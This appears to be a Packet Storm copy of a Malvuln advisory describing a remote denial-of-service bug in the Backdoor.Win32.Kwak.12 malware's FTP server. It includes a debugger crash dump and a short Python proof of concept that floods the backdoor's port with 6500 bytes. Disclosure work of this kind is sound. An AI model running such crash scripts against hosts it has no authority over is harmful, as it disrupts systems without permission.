what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Kwak.12 MVID-2021-0146 Denial Of Service

Backdoor.Win32.Kwak.12 MVID-2021-0146 Denial Of Service
Posted Mar 26, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Kwak.12 malware suffers from a denial of service vulnerability.

tags | exploit, denial of service
systems | windows
SHA-256 | f6064b7bc1bed41b2dea4b3739c7fc444408c57e11f23d5ff1b18043c79c86cc

Backdoor.Win32.Kwak.12 MVID-2021-0146 Denial Of Service

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/c25393545e5ead3a35996ef9a887bd34_C.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Kwak.12
Vulnerability: Remote Denial of Service
Description: The backdoor runs an FTP server that listens on TCP port 37885. Attackers who can reach the infected host can send a payload of around 6500 bytes using socket program to cause an unknown internal exception to crash the malware.
Type: PE32
MD5: c25393545e5ead3a35996ef9a887bd34
Vuln ID: MVID-2021-0146
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 03/25/2021

Memory Dump:
(d30.1084): Unknown exception - code 0eedfade (first/second chance not available)
eax=0019fd18 ebx=03fa4458 ecx=00000007 edx=00000000 esi=03fa3af0 edi=03fa49b0
eip=75eb08f2 esp=0019fd18 ebp=0019fd70 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
KERNELBASE!RaiseException+0x62:
75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h] ss:002b:0019fd6c=af5cfeac


0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
ExceptionCode: 0eedfade
ExceptionFlags: 00000001
NumberParameters: 7
Parameter[0]: 004151a2
Parameter[1]: 03fa6724
Parameter[2]: 03fa4458
Parameter[3]: 03fa3af0
Parameter[4]: 03fa49b0
Parameter[5]: 0019fdac
Parameter[6]: 0019fda4

DEFAULT_BUCKET_ID: DELPHI_EXCEPTION

PROCESS_NAME: Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1: 004151a2

EXCEPTION_PARAMETER2: 03fa6724

EXCEPTION_PARAMETER3: 03fa4458

EXCEPTION_PARAMETER4: 3fa3af0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00001084

PRIMARY_PROBLEM_CLASS: DELPHI_EXCEPTION

BUGCHECK_STR: APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER: from 004490f9 to 75eb08f2

STACK_TEXT:
0019fdbc 004490f9 03fa3af0 03fa234c 03fa3af0 KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fdf0 004490f9 03fa234c 03fa234c 03fa234c Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019fe6c 004017fa 0019ff01 0019feac 00455c3f Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019fea0 004017a5 03fa1fd0 0019ff70 00455c3f Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x7a1
0019fed4 004490f9 0046119e 0044c754 00428d70 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x74c
0019ff04 0045b8cf 00000000 00461330 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019ff2c 0045b91e 004674e4 00000001 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45ba7
0019ff50 0045ac48 00000000 00000000 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45bf6
0019ff64 0045baf4 00000000 0019ffcc 0045688c Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x44f20
0019ff80 76198654 002b8000 76198630 c91b9631 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45dcc
0019ff94 77104a77 002b8000 3d0540e2 00000000 kernel32!BaseThreadInitThunk+0x24
0019ffdc 77104a47 ffffffff 77129eb7 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 00483060 002b8000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND: ~0s; .ecxr ; kb

FOLLOWUP_IP:
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+333d1
004490f9 8b5e10 mov ebx,dword ptr [esi+10h]

SYMBOL_STACK_INDEX: 1

SYMBOL_NAME: backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34

IMAGE_NAME: Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 39a61aec

BUCKET_ID: APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1

FAILURE_BUCKET_ID: DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe!Ftpsrvcinitialization$qqrv



Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=37885

def doit():

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

PAYLOAD="A"*6500
s.send(PAYLOAD)
s.close()

print("Backdoor.Win32.Kwak.12 / Remote Denial of Service")
print("MD5: c25393545e5ead3a35996ef9a887bd34")
print("By Malvuln")


if __name__=="__main__":
doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close